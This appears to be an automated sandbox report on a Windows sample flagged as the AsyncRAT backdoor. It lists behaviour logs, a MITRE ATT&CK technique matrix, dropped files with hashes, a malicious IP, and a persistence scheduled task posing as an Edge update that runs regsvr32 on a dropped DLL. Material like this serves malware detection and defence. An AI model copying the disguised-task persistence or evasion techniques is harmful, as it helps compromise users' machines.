Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 6_2_00007FF8A9347C00 GetCurrentProcessId,ProcessPrng,HeapFree,CreateNamedPipeW,GetLastError,HeapFree,HeapFree,HeapFree,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,CloseHandle,

6_2_00007FF8A9347C00

Source: C:\Windows\System32\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	1 Masquerading	1 Input Capture	111 Security Software Discovery	Remote Services	1 Input Capture	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	212 Process Injection	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	1 DLL Side-Loading	212 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 System Owner/User Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Regsvr32	DCSync	23 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
h40thEqmz6.exe	64%	Virustotal		Browse
h40thEqmz6.exe	55%	ReversingLabs	Win32.Backdoor.Asyncrat

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\is-IC11J.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-IC11J.tmp\_isetup\_setup64.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\is-IC11J.tmp\_isetup\_shfoldr.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-IC11J.tmp\_isetup\_shfoldr.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-J5IQG.tmp\h40thEqmz6.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	4%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\is-PH0LE.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-PH0LE.tmp\_isetup\_shfoldr.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\is-UGL1J.tmp	4%	ReversingLabs
C:\Users\user\AppData\Local\unins000.exe (copy)	4%	ReversingLabs
C:\Users\user\AppData\Roaming\Setup_Coat.dll (copy)	70%	ReversingLabs	Win64.Trojan.CrypterX
C:\Users\user\AppData\Roaming\is-CBKGS.tmp	70%	ReversingLabs	Win64.Trojan.CrypterX

Name	Source	Malicious	Reputation
http://www.innosetup.com/	h40thEqmz6.exe, 00000000.00000003.1996919927.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, h40thEqmz6.exe, 00000000.00000003.1997111463.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, h40thEqmz6.tmp, 00000001.00000000.1997652661.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UGL1J.tmp.4.dr, h40thEqmz6.tmp.0.dr, h40thEqmz6.tmp.2.dr	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000007.00000002.2096777613.000001D2BE6CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2211891666.000002C41BCAE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000007.00000002.2065758420.000001D2AE888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000007.00000002.2065758420.000001D2AE888000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000009.00000002.2211891666.000002C41BCAE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000007.00000002.2096777613.000001D2BE6CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2211891666.000002C41BCAE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.microsoft.co	powershell.exe, 00000009.00000002.2226315650.000002C4244A0000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000009.00000002.2211891666.000002C41BCAE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000009.00000002.2211891666.000002C41BCAE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore68	powershell.exe, 00000007.00000002.2065758420.000001D2AE661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2141845247.000002C40BC41000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.remobjects.com/ps	h40thEqmz6.exe, 00000000.00000003.1996919927.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, h40thEqmz6.exe, 00000000.00000003.1997111463.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, h40thEqmz6.tmp, 00000001.00000000.1997652661.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-UGL1J.tmp.4.dr, h40thEqmz6.tmp.0.dr, h40thEqmz6.tmp.2.dr	false	high
https://docs.rs/getrandom#nodejs-es-module-support/rust/deps	h40thEqmz6.tmp, 00000004.00000003.2007225545.0000000005B20000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmp, is-CBKGS.tmp.4.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000007.00000002.2065758420.000001D2AE661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2141845247.000002C40BC41000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000009.00000002.2141845247.000002C40BE68000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
38.49.56.2	unknown	United States		174	COGENT-174US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584666
Start date and time:	2025-01-06 07:39:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	h40thEqmz6.exe renamed because original name is a hash value
Original Sample Name:	c344f9de1aa1bf284d8281aff7b216ca85b2dde7fc05e1d13b5abcef37d4ca0d.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@20/22@0/1
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 33 Number of non-executed functions: 192
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2000 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6024 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:39:57	API Interceptor	45x Sleep call for process: powershell.exe modified
01:41:17	API Interceptor	14x Sleep call for process: regsvr32.exe modified
07:40:09	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskMachineUA{7A7D6BFF-F589-4298-BDDA-3BBA941A2598} path: regsvr32 s>/S /i:360 C:\Users\user\AppData\Roaming\Setup_Coat.dll

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COGENT-174US	3.elf	Get hash	malicious	Unknown	Browse	38.162.130.105
	i686.elf	Get hash	malicious	Mirai	Browse	38.60.221.89
	Fantazy.spc.elf	Get hash	malicious	Unknown	Browse	38.196.127.211
	Fantazy.m68k.elf	Get hash	malicious	Unknown	Browse	38.227.136.220
	Fantazy.arm7.elf	Get hash	malicious	Mirai	Browse	38.48.114.39
	momo.mips.elf	Get hash	malicious	Mirai	Browse	206.1.21.164
	momo.mpsl.elf	Get hash	malicious	Mirai	Browse	206.1.21.186
	momo.arm7.elf	Get hash	malicious	Mirai	Browse	149.52.60.238
	z0r0.x86.elf	Get hash	malicious	Mirai	Browse	149.30.141.192
	4.elf	Get hash	malicious	Unknown	Browse	38.176.131.73

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\is-IC11J.tmp\_isetup\_setup64.tmp	8n26gvrXUM.exe	Get hash	malicious	Unknown	Browse
	8n26gvrXUM.exe	Get hash	malicious	Unknown	Browse
	4iogI3WCTh.exe	Get hash	malicious	GhostRat	Browse
	setup.exe	Get hash	malicious	Unknown	Browse
	RXxeYma4d5.exe	Get hash	malicious	GhostRat	Browse
	017069451a4dbc523a1165a2f1bd361a762bb40856778.exe	Get hash	malicious	Unknown	Browse
	vc8Kx5C54G.exe	Get hash	malicious	Socks5Systemz	Browse
	AbC0LBkVhr.exe	Get hash	malicious	Socks5Systemz	Browse
	Mg5bMQ2lWi.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse
	KRdh0OaXqH.exe	Get hash	malicious	Petite Virus, Socks5Systemz	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03q2atcw.qqp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dqwranwo.413.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnqqz2p4.f5x.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pp5ruzs0.rr0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpmhjexg.01m.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfjybxrv.lio.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ym2u22ik.y4d.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z2d3lt1x.2rr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-IC11J.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.215994423157539
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5:	4FF75F505FDDCC6A9AE62216446205D9
SHA1:	EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256:	A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512:	BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: 8n26gvrXUM.exe, Detection: malicious, Browse Filename: 8n26gvrXUM.exe, Detection: malicious, Browse Filename: 4iogI3WCTh.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: RXxeYma4d5.exe, Detection: malicious, Browse Filename: 017069451a4dbc523a1165a2f1bd361a762bb40856778.exe, Detection: malicious, Browse Filename: vc8Kx5C54G.exe, Detection: malicious, Browse Filename: AbC0LBkVhr.exe, Detection: malicious, Browse Filename: Mg5bMQ2lWi.exe, Detection: malicious, Browse Filename: KRdh0OaXqH.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-IC11J.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KTUSV.tmp\h40thEqmz6.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
